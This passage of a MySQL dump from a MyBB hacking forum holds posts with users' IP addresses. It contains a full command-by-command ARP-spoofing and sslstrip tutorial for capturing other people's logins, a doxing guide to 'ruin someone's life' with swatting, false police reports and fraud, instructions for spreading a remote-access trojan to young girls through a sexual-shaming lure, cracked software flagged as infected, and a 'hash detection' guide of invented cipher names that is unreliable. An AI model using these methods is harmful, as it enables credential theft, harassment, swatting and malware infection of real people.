'b622a8fb30743bb46b7cdc1e7b31d50e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('173', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '27', 'Hil', '1344027571', 'Well, i didn\'t need this at all. But i think it\'ll become handy for our new moderators.', '80.72.152.146', '1346934930', '0', '0', '0', '0', '1', '519ea47e9b6bf48bdbda1f6656d5d35a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('174', '73', '0', '12', '|TUT| How to get any Website Login Passwords with uses SSL Encryption', '0', '1', 't3h jok3r', '1344114388', '[align=center][size=x-large][b]|TUT| How to get any Login Passwords with SSL Encryption[/b][/size][/align] Hey folks, in this tutorial you\'re going to learn how get any Logins with a SSL Encyryption. This is my first tutorial ever, so I try my best to explain everything in detail. But if u have any questions feel free to ask. [u][size=large][color=#FF0000][b][align=center]THIS TUT IS FOR EDUCATIONAL PURPOSES ONLY ! SO DON\'T TRY THIS AT ANY OTHER NETWORKS WHICH ISN\'T YOURS ! [/align][/b][/color][/size][/u] [u][b]WHAT U NEED FOR THIS TUTORIAL :[/b][/u] - 1. Backtrack 4 RC2 ( For those who don\'t know what it is : it is a Linux Distribution.) You can use VMWARE (PC/MAC) or Parallels (MAC). Or u can use BT as a LIVE CD. IMPORTANT : Backtrack is a legal Operating System, and u can download it free. Just Google for it. - 2. A internal / external WIFI card which is supported by BackTrack ( If u don\'t have any WIFI Card which is supported by BT, go and buy one Ebay for cheap. Normally every WIFI Card which has a Atheros or Realtek Chip should work.) But u can check ur WIFI Card here if your card is SUPPORTED :oui: or NOT :non: HERE [url=http://www.aircrack-ng.org/doku.php?id=compatibility_drivers#compatibility]Compatibility List[/url] - 3. A Network like your home network with some Computers connected to the Router or School Network if u don\'t have a another PC to test ( BUT ONLY FOR EDUCATIONAL PURPOSES ONLY ) - 4. A slave ( another PC connected to your network ) [u][b]HOW DOES IT WORK :[/b][/u] Well there is a few things your doing. One of the major part is that you are doing is a ARP Poisoning. ( NOW IT GETS REALLY CONFUSING :blink: , BUT I TRY TO KEEP IT SIMPLE ) With the ARP Poisoning you are manipulating the arp packages and rerouting every package to your PC. NOW to understand this method : You are saying the Router that you are the slave Pc and to the slave Pc you are saying that you are the Router. We call this method \" Man in the Middle Attack\". The second part is to \"DECRYPT\" the SSL Encryption ( it\'s not a decryting at all ) with SSLSTRIP. Well what u doing is that you are filtering everything between the slave PC and the Router. [b][u]NOW LET\'S GET STARTED :[/u][/b] - First let\'s check if your WIFI Card is supported or not. Open the Terminal ( it is the black Box in the Taskbar ) and type : [b]airmon-ng[/b] - Now you should see your WIFI Card. We need start up the WIFI Card. So type : [b]airmon-ng start [interface-name, in my case it\'s wlan0] wlan0[/b] [spoiler] [img]http://i.min.us/ilymfW.png[/img] [/spoiler] - Now we have to connect to our own Network. But this is a little bit complicated. Anyway let\'s face it. Go to the BT Icon ( It\'s the icon in left below corner, it\'s a dragon icon ) and click it. Now u see a Menu. Go to \"Internet\" => And choose the \"Wicd Network Manager\" [spoiler] [img]http://i.min.us/ijifuk.png[/img] [/spoiler] - It should open the WICD Manager. Now you should see your Wireless Network, if not just click on the \"Refresh\"-Button. The next Step is to connect to your network. If u have any WIFI Encryption ( which I highly recommend ), then u have to enter it. Just click on the \"Properties\"-Button next to the \"Connect\"-Button. Choose your encryption and enter the password. If u have successfully connected to the network, just minimize the window. [b](DON\'T CLOSE IT !)[/b] [spoiler] [img]http://i.min.us/ijh0PI.png[/img] [/spoiler] OKAY, now we have to set up everything for SSLSTRIP. Go to the terminal and type following command : [b]kate /etc/etter.conf[/b] - We have edit this config file. Scroll down to the \"Linux\" Section. Uncomment (= remove the \"#\" ) before \"redir_command_on\" and \"redir_command_off\" . Just click save and close the editor. [spoiler] [img]http://i.min.us/ijh2XQ.png[/img] [/spoiler] - Open a new up a Terminal and type the following command : [b]echo 1 > /proc/sys/net/ipv4/ip_forward[/b] - Now type : [b]arpspoof -i (your device name, in my case it\'s wlan0 )wlan0 -t (the specific slave\'s ip) 192.168.1.6 (and ip od the router )192.168.1.1[/b] [b]arpspoof -i wlan0 -t 192.168.1.6 192.168.1.1[/b] -BUT if u like to poison the whole network just type : [b]arpspoof -i wlan0 (ip of the router) 192.168.1.1[/b] [b]arpspoof -i wlan0 192.168.1.1[/b] - Open another Terminal and type : [b]iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000[/b] -Then in the same Terminal window : [b]ettercap -T -q -i wlan0 [/b] -Finally open a new Terminal and type : [b]sslstrip -a -k -f[/b] -AND FINALLY OPEN THE FINAL AND LAST TERMINAL AND TYPE: [b]ettercap -T -q -i wlan0[/b] NOW you are ready to go, let the slave login to any site with ssl. Grap a Coffee and wait. Here are some demonstration pics : [spoiler] [img]http://i.min.us/ijmxMw.png[/img] [/spoiler] [spoiler] [img]http://i.min.us/ijibhY.png[/img] [/spoiler]', '41.174.24.14', '699275278', '1', '0', '1', '1344114684', '1', 'e461a67c848be5d8ce53d86b1e943554', '0', '1344114684'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('175', '74', '0', '12', '? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '5', 'Timmy', '1344114849', 'Hey guys! I have been working a while on this! And I finally found a way to get free drinks out of vending machines, just by using the codes the programers and re-fillers use! You can also download it at my website http://tackyshack.blogspot.com JUST GOTO MY WEBSITE PLEASE :D Credits: Sit hacks a lot Post # 7 I don\'t have a direct link unfortunately because I don\'t run the blog. If anyone has a problem, then feel free to report.', '41.174.24.14', '699275278', '1', '0', '1', '1345678708', '1', 'efc50f00e83fa5cc324f2a80ba692f54', '0', '1345678708'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('176', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '5', 'Timmy', '1344114911', 'Good DDoSer but didn\'t you post this in the wrong section?', '41.174.24.14', '699275278', '1', '0', '0', '0', '1', 'cbbdf70776fa815f62b0aed01ef94a48', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('177', '29', '83', '15', 'RE: ???Italian DDoS tool (Great for hitting sites offline)???', '0', '26', 'bixlow803', '1344118953', 'Nice öne hope i enjoy it, by theway. What happen to l33thackers.Com is it down?', '203.177.42.214', '-877581610', '0', '0', '0', '0', '1', '0d8b04376624dbaae11622d4af4ef8a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('178', '55', '139', '12', 'RE: [tut] SMS Bomber', '0', '8', 'spacefish36', '1344197719', 'Works like a charm. Thanks, just worried about the virus scan.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', '352c11b967b57dfa15041651498006b4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('179', '55', '139', '12', 'RE: [tut] SMS Bomber', '0', '9', 'p420', '1344197810', 'Don\'t worry, because it so-called hacks android phones to allow such a message through.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', '4ce8f62caaac3a78cbf067a9d19f7f60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('180', '73', '174', '12', 'RE: |TUT| How to get any Website Login Passwords with uses SSL Encryption', '0', '8', 'spacefish36', '1344197892', 'Thanks a bunch, I\'m going to download Backtrack and buy the needful stuff. This thing crazy, thanks.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', '4f73f7f095974cf70ef5f4dae1c9f81f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('181', '75', '0', '13', '~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '8', 'spacefish36', '1344198200', '[i]Hello guys. You want someone\'s IP? Use one of these methods ;)[/i] [color=#FF0000][b]Method 1: Syntaxmaster[/b][/color] [size=x-small]In my opinion, this is the best method for getting someone\'s IP.[/size] 1) [b][color=#FFD700]Register at[/color] [color=#32CD32]syntaxmaster.info[/color] [color=#1E90FF](very easy!)[/color], [color=#FFD700]and go to[/color] [color=#32CD32]Software/Tools > IP Stealer.[/color][/b] 2) [b][color=#FFD700]Put in a site you want your slave to be redirected to. This doesn\'t matter, you can just put anything.[/color][/b] 3) [b][color=#FFD700]There should be a site somewhere. Copy that site, and make it shorter on sites like[/color] [color=#FF1493]goo.gl[/color] [color=#FFD700]and[/color] [color=#FF1493]bit.ly[/color][/b] 4) [b][color=#C71585]Send the site to your slave. When he clicks on it, you\'ll get his IP on the same site as you got the link from.[/color][/b] [color=#32CD32][b]Method 2: Getting a mail from your slave.[/b][/color] [size=x-small]Not the best method, but it works.[/size] 1) [b][color=#FF0000]Send your slave an email:[/color] [color=#FFD700]\'hi, how are you?\'[/color] [color=#FF0000]or something like that.[/color][/b] 2) [b][color=#FF0000]If he sends a mail back, you\'re lucky.[/color] [color=#32CD32]Right Mouse Button > View Source,[/color] [color=#FF0000]his IP should be there.[/color][/b] [color=#FFD700][b]Method 3: IPGet (MSN+ Add-on)[/b][/color] [i]I never used this program before, so I can\'t tell you anything. I only know it\'s a good method for getting someone\'s IP.[/i] [url=http://www.msgplus.net/Downloads/][b][color=#FF1493]Click here for the MSN+ Download Link.[/color][/b][/url] [color=#FF0000][b]Method 4: Skype[/b][/color] [size=x-small]Not the easiest method, but it works[/size] 1) [b][color=#00BFFF]Start a conversation with your slave. Text or Call, doesn\'t matter.[/color][/b] 2) [b][color=#FF0000]Go to CMD, and type in netstat -nbt[/color][/b] 3) [b][color=#FFD700]Then you should get his IP.[/color][/b] I hope this tutorial helped! Again, sorry for my bad English', '41.174.54.91', '699283035', '0', '0', '8', '1344198242', '1', '21d8b166f2221f711c2006b94d08abc6', '0', '1344198242'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('182', '75', '181', '13', 'RE: ~[TUT]~ How to get someone\'s IP ~[TUT]~', '0', '1', 't3h jok3r', '1344198334', 'Nice theme and methods. Thanks for contributing.', '41.174.54.91', '699283035', '1', '0', '0', '0', '1', '4774874bd9c10070bec6b38beee25fc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('183', '76', '0', '14', 'Hide-IP-Browser', '0', '12', 'jonas83', '1344198709', 'Just found this while surfing the net for some software. [img]http://i31.fastpic.ru/big/2012/0111/0c/9cd488e943d3e849485d9b9e088aaa0c.png[/img] Hide-IP-Browser v2.0 | 2 Mb The ultimate hide IP address software. Find out how to hide your IP address easily. Hiding your real IP address is the only technique that can help you protect your identity while browsing the web. By using Hide-IP-Browser you can surf any Web Site, Web-based Email services, Newsgroups, Web Blogs and Forums using a different IP address. How it Works? Hide-IP-Browser protects your identity by replacing your real IP address with a different one. You will appear to access the internet from a different location, not your own. Your real location is never revealed. We are using proxies from different countries to hide your IP address. A partial country list from where you can get a new IP address is this: United States, United Kingdom, Israel, Canada, Germany, Japan, Netherlands, and many more. Home: http://www.hide-ip-browser.com Download [code] https://www.rapidshare.com/files/4290382747/X-20HIB.rar http://filepost.com/files/e21a5e83/X-20HIB.rar [/code] [b]Virus Scan[/b] [spoiler] File Info Report date: 2012-01-11 18:29:28 (GMT 1) File name: [b]hide-ip-browser-v2-0-crk-res-z[/b] File size: 2219569 bytes MD5 Hash: 0f11b2a2094bfe868cc5b1b69eabf12f SHA1 Hash: 3ccd7f9f441556d1df3a42e782b453f18ff4f169 Detection rate: [color=#FF0000]1[/color] on 9 (11%) Status: [color=#FF0000]INFECTED READ THE DISCLAIMER BEFORE FLAMING ME![/color] Detections Avast - AVG - Avira AntiVir - ClamAV - Comodo - Emsisoft - F-Prot - W32/Internet-Trojan-patched-based!Maximus Ikarus - TrendMicro - Scan report generated by NoVirusThanks.org [/spoiler] Its just a false positive because of the patched file. If you are unsure or really a cautious person run it in a VM or Sandboxie etc.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', 'f61913aa44b2fe562e67441ece05b7ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('184', '77', '0', '16', 'Disguise your voice over Skype', '0', '12', 'jonas83', '1344198838', 'If anybody needs a voicechanger for skype ,then here\'s a good one. http://clownfish-translator.com/download.html Download and install, then go to the right bottom of your desktop , and you\'ll see a little clownfish. right click on it and select voice changer , then voices and select the voice u want. ( To test your voice select hear voice ) Then go to skype, it should be something like \"clownfish.exe wants to use skype\" or something. Accept it and normally your voice should be changed.', '41.174.54.91', '699283035', '0', '0', '0', '0', '1', 'a3309500b9cd2132b3564aac1329c7e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('185', '62', '148', '25', 'RE: [Guide]Firewalls', '0', '1', 't3h jok3r', '1344199034', 'Great, I feel safe now LOL. Nice guide, hopefully I\'m protected.', '41.174.54.91', '699283035', '1', '0', '0', '0', '1', 'f63d945b504476f3ae9db317729e49b7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('186', '2', '4', '34', 'RE: Userbar tut', '0', '1', 't3h jok3r', '1344199074', 'No problem, thanks for the comment though.', '41.174.54.91', '699283035', '1', '0', '0', '0', '1', '377526730436b139a244f5ddcc6d42aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('187', '78', '0', '7', 'Dota 2 beta keys giveawat!', '0', '27', 'Hil', '1344282662', 'Hey guys, Steelseries and Valve are doing a big giveaway.. Here ya go: http://c.steelseries.com/dota2betakey?code=9PadFUpC Please use my ref link! :D', '80.72.152.146', '1346934930', '0', '0', '0', '0', '1', 'a86bb991bf3c7b0c09649f5336694c3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('188', '78', '187', '7', 'RE: Dota 2 beta keys giveawat!', '0', '1', 't3h jok3r', '1344285699', 'Awesome, seems like to be an awesome website.', '41.174.53.95', '699282783', '1', '0', '0', '0', '1', 'b195b69312f69d20e0eec170338146e4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('189', '79', '0', '29', '[tut]How to ruin somones life[DOX]', '0', '1', 't3h jok3r', '1344287048', 'Hello L33T Hacking, This is a tutorial on how to ruin someone\'s life with a dox. Please use these tactics at your own risk.You must use a proxy when using these tactics, you may get caught so I recommend a proxy. Google \'\'Free Proxies\'\' or anonym.to , if you\'re in need of getting behind a proxy. Also, you\'ll need a dox on the person you\'re going to ruin. What is a Dox? Personal information. How do you dox? You may want to use the search button part of the forum. Now lets begin. Pizza Bombs: Get behind a proxy. Go to some pizzeria that allows delivering from the web like Dominos The food is delivered to the target\'s place of residence, where they will have to deal with a delivery order from you. Box Floods: Create an account on USPS Go to the USPS\'s Store and order all the free boxes or mailing envelopes. Confirm the street address and purchase them. The maximize of ordering packs on a single account is 20. Meet up\'s There\'s a website that allows you to plan parties and bunch of hippies go to the slave\'s house thinking that there is a party. That is this. Sending Mail in real life: Go to a post office, say you are moving, or you are new to the area and need to redirect your mail temporally. They will give you an envelope or postcard to fill out and drop in any mailbox. To the best I know, there is no checking done on the part of the USPS. A good tactic is to make the envelopes look official with the logos and such of your victims local council/government/tax office/police station. Free Tampons If the slave likes tampons, why don\'t we send them some? These kind of deliveries are annoying to a lot of people. Send Free Tampons! Craiglist Post that \"you\" are having a garage sale. You are moving and everything needs to go out. You\'ll have an HDTV or Motorcycle there for $50, a stereo set for $100 and many other cheap ass high-end things. Steal pictures off the internet of \"your items\". Enter your slave\'s address, and choose a date over the weekend. On those days your slave will have strangers coming to his/she house constantly asking for cheap stuff. Sometimes even the POLICE gets involved. Why? Police track down thefts. If your slave is selling a bunch of high end merchandise, it\'s likely the police will check those out. Craiglist Prostitutes Go to Craigslist . Click on the state where the slave is located at. Go to Services, and under that click Erotic. Call all the out call escorts-out call means that they come to you and make an appointment with the target. Police Raid Report the slave or target as an anonymous tip for suspiciousness of selling drugs. Police harassment will occur. Ruining a Marriage: Collect information about a married man that you know. Get a girl to call his house. If the wife answers, hang up. Do this another time. On the third time, ask for the guy. This will cause lots of suspicion. Keep this up for a month and see his marriage ruined. Purchasing orders: Take an anonymous prepaid credit card Buy an anonymous VoIP fax service Obtain a professional looking form from a print shop Fax POs through tor Most companies will ship no questions asked after receiving a PO. Said companies will come after your target and sue them and ruin their credit, and they\'ll have fucking tons of shit that they don\'t know what to do with. Swatting: Using skype or spoof card and calling the cops and saying theres a man with a gun in your house holding you and your family hostage. The swat breaks down your door, ties everyone up and talks to all of you and maybe brings you to the station. The police find out there wasnt a hostage situation and goes back to look at the call and thinks your from from england because thats where skype is located. Make shure you dont have any real info or a phone number on ure skype account.Credit goes to Hydro for this tactic. Police Piracy Rape: Report the guy to the police saying that he is selling pirated software. Police raid occurs Confiscated computer occurs', '41.174.54.150', '699283094', '1', '0', '1', '1352589728', '1', '1dd2a35ce4d1ca730d1340f7a5404894', '0', '1352589728'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('190', '80', '0', '24', 'How WiFi Security Works', '0', '1', 't3h jok3r', '1344287527', '[u][b]How WiFi Security Works[/b][/u] when you use a WiFi network, you\'re an open book. The same technology that lets you browse the Web from your back porch can let invaders hop onto your network from outside your location. By its nature, WiFi is open technology. A wireless router broadcasts its presence to any device with a WiFi adapter within its range, and if the router is unprotected, anyone who wants to can connect to it and use the network. That makes it easy to get in. A common invader is called a \'war driver\'. A war driver is a person or people who drive through areas known for having WiFi networks, they search for unprotected networks they can break into. They use software what makes it easy to find unprotected networks. Some use high powered antennas so that they can find as many networks as possible.But, they don\'t even need this kind of equipment to get into networks. Software built directly into Windows XP, for example, makes it easy for anyone to find and connect to an unprotected network as many of us know When war drivers target a business network, they may be looking for proprietary business information, or they may be looking to do some malicious damage. When they target a home network, they may be looking for personal information, such as credit cards, or they may be also looking to damage computers as well. WiFi intruders can cause other problems, these may be even more serious than stealing information or damaging computers. They can use this for illegal activitiesand if those activities are uncovered, it may look as if the owner of the network is guilty, because the war driver will be long gone. Intruders can use WiFi for other purposes as well, such as illegally downloading music and videos, or using the network to attack other networks. There are a variety of ways to protect against these intruders, but one of the primary ways is to use encryption, a means of scrambling data so that only those with the proper encryption keys can read it. THOSE BASTARDS!!. Encryption can be used to keep anyone out of a network who doesn\'t have the proper key. There are a variety of encryption standards, notably the WEP (Wired Encryption Protocol) and WPA (WiFi Protected Access). WEP is the older standard, and not as powerful as WPA, but for home networks it\'s usually adequate, because it can keep out all but the most dedicated intruders, and these rarely target home networks,uh not. WPA is more powerful, and is usually used in businesses,but can be used at home as well. [b][u]How WiFi Encryption Works[/u][/b] WPA encryption can be used in corporations or in home networks. When used in a corporation, a computer with a wireless adapter first makes a connection to a wireless AP( Access Point). In order to be let in the network, it needs to be authenticated using 802.11X authentication with a version of the Extensible Authentication Protocol( EAP). To be authenticated, the computer needs to send a password, an ID, or use some form of hardware based authentication, like comparing MAC (Media Access Control )addresses. The AP passes the ID along to an authentication server. The server checks to make sure that the ID is valid. If the ID is valid, the authentication server sends a master TKIP(Temporal Key Integrity Protocol.) \"key\" to both the computer and to the AP. The key is installed on both the computer and the AP, and the computer can now get onto the network. When a computer tries to get onto the network or read any data passing across the network, and it doesn\'t have a valid key or its key has been rejected by the authentication server, it will not be allowed onto the network. All data sent across the network is encrypted using this key, and only those with the proper key can read it. So if someone snoops on data being sent across the network, they\'ll see only scrambled gibberish, and won\'t be able to steal information or data. In a home network or small network, WPA can be used without an authentication server, although its not as secure as WAP using an authentication server. Om this case, a password is entered manually into each computer and AP on the network, and so only those devices will be able to use the network or read network data. Computers without the key will be rejected from the network and will not be able to read data.', '41.174.54.150', '699283094', '1', '0', '0', '0', '1', '91f7bfdef0b55610beb89e9fc4c6a10f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('191', '81', '0', '12', '[tut]How to spread your server', '0', '4', 'Triple H', '1344287709', '1. Upload your server on mediafire.com or somewhere else ( take a jpeg icon for your server ) 2. Goto \"[b]ask.fm[/b]\". It\'s a website where people can ask questions to registrated members (most of them are young girls ) on bottom of this site are some online members (after reloading the site, there are new ones) 3. Spread your virus-link! post a question on their site which makes them wanna download your file. for example: \"[i][color=#FFFFFF]Arent you embarrassed that there are naked pictures of you to download rigth here? - DOWNLOADLINK -[/color][/i]\" 4. Wait untill they connect Its not the best way to spread but its okay I make ~ 30/40 slaves in 10 minutes', '41.174.54.150', '699283094', '1', '0', '0', '0', '1', '934d270f9ca118568fd00df9821fb993', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('192', '74', '175', '12', 'RE: ? FREE DRINKS OUT OF VENDING MACHINES | CODE REVEALED | FREE ?', '0', '4', 'Triple H', '1344287783', 'Nice blog, hopefully it works.', '41.174.54.150', '699283094', '1', '0', '0', '0', '1', '61926e980a56453e9a34bdb3bc84cdb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('193', '82', '0', '13', '[guide]How to detect Hash Type', '0', '17', 'khade009', '1344287942', '[b]Base64[/b] Ends with == Example [code]c21hc2hwdW1wa2lucw==[/code] [b]Megan-35[/b] Last digit is 5 Example [code]mwvXmwXqngvqkw1Vmq55[/code] [b]Feron-74[/b] Last digit is 4 Example [code]CmlxCmxisuliPmygCi44[/code] [b]AER-256[/b] Starts with 2 Second number isnt bigger than 6 Contains ,. Example: [code]2475686.270836455, 2412016.365752809, 33.673757802746564[/code] [b]Armon-64[/b] In middle has + Contains . . Starts with 2 Example: [code]25448157090.709496+94249848.213684[/code] [b]ATOM-128[/b] Usually contains + Starts with letter Mostly are letters Usually ends with CC Example: [code]nIhqLjQ5MiT6Ml63+/CC[/code] [b]ESAB-46[/b] Ends with // Contains letters and numbers Example: [code]8mlR8mRg92lg3mVe8g//[/code] [b]EZIP-64[/b] Huge amount of numbers Usually contains ././ Starts with 1 Example: [code]15623.730897750893/14124.447874419286/15213.338713579566/-126.04199709670604[/code] [b]GILA7[/b] Ends with Letter Starts with G Sometimes contains +,= Example [code]qrF1qr1538F5DrOmq5GG[/code] [b]OKTO3[/b] Lists numbers Example: [code]748063693824791400 747938510478572200 761035954145620400 696080542373685800 -515497671532164.4[/code] [b]TIGO-3FX[/b] Contains = Sometimes ends with FXX Example: [code]7If9=8fpBltnBkHY[/code] [b]TRIPO-5[/b] Ends with TT Contains / Example: [code]Vb9KdExM/zpMWwTT[/code] [b]ZARA-128[/b] Looks like this [code]427 421 409 427 416 424 429 421 424 419 417 422 427[/code] [b]ZONG22[/b] Mostly ends with 2 Example : [code]dfNbYvNhoop2[/code] [b]HAZZ-15[/b] Ends with 55 Starts with q Example: [code]qmlGwujeD8JFDoFsEH55[/code] Site that you can encrypt/decrypt [code]www.crypo.com md5decrypter.co.uk[/code]', '41.174.54.150', '699283094', '0', '0', '0', '0', '1', '591f6480eb3fc371dbc1acd95fb22093', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('194', '28', '82', '3', 'RE: Buttons updated.', '0', '17', 'khade009', '1344287989', 'The new buttons are pretty cool.', '41.174.54.150', '699283094', '0', '0', '0', '0', '1', 'ac9d9634ada7d4c1ae3ecba808261776', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('195', '14', '39', '8', 'RE: Work Hard Play Hard-Rap', '0', '17', 'khade009', '1344288046', 'I love the song too, well I use to. Now I like cashing out.', '41.174.54.150', '699283094', '0', '0', '0', '0', '1', '6fc54a9abff23f4557c515f8568593d7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('196', '83', '0', '34', '[tut]How to make a thread design', '0', '9', 'p420', '1344288236', '[color=#87CEFA][size=medium]Details: [/size][/color] Difficulty: Intermediate with some advanced techniques Time: Varies-- Generally 30 minutes and up [img]http://i.minus.com/icXuXtpbOQh2w.png[/img] [img]http://i.minus.com/iLurZE0UDQJIh.png[/img] [img]http://i.minus.com/ipId0W0ZYCAcI.png[/img] [img]http://i.minus.com/iFv2tMjj24ePE.png[/img] [img]http://i.minus.com/iTLAcH6Vyv4VY.png[/img]', '41.174.54.150', '699283094', '0', '0', '9', '1344288275', '1', 'e43f88c4bd837acff84873e155da85b4', '0', '1344288275'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('197', '83', '196', '34', 'RE: [tut]How to make a thread design', '0', '20', 'JakeUS', '1344288772', 'This is a very HQ tutorial. Thanks for posting it!', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 